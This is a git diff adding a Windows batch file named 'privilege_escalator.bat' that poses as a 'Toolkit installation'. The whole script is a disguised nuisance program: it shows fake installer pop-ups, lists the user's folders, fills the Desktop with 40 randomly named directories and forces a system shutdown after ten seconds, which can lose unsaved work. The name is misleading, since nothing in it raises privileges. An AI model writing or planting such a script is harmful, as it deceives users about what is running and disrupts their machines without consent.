diff options
Diffstat (limited to 'Privilege Escalator/privilege_escalator.bat')
-rw-r--r-- | Privilege Escalator/privilege_escalator.bat | 15 |
1 files changed, 15 insertions, 0 deletions
diff --git a/Privilege Escalator/privilege_escalator.bat b/Privilege Escalator/privilege_escalator.bat new file mode 100644 index 0000000..fa02a12 --- /dev/null +++ b/Privilege Escalator/privilege_escalator.bat @@ -0,0 +1,15 @@ +@echo off
+title Toolkit installation
+msg * Toolkit installation is starting
+cd /d %systemdrive%\Users\%username%\
+@echo on
+tree
+@echo off
+cd /d %systemdrive%\Users\%username%\Desktop
+setlocal EnableDelayedExpansion
+ for /l %%x in (1,1,40) do (
+ mkdir !random!
+ )
+endlocal
+msg * The toolkit installation is nearly complete please wait ...
+shutdown /s /t 10
\ No newline at end of file |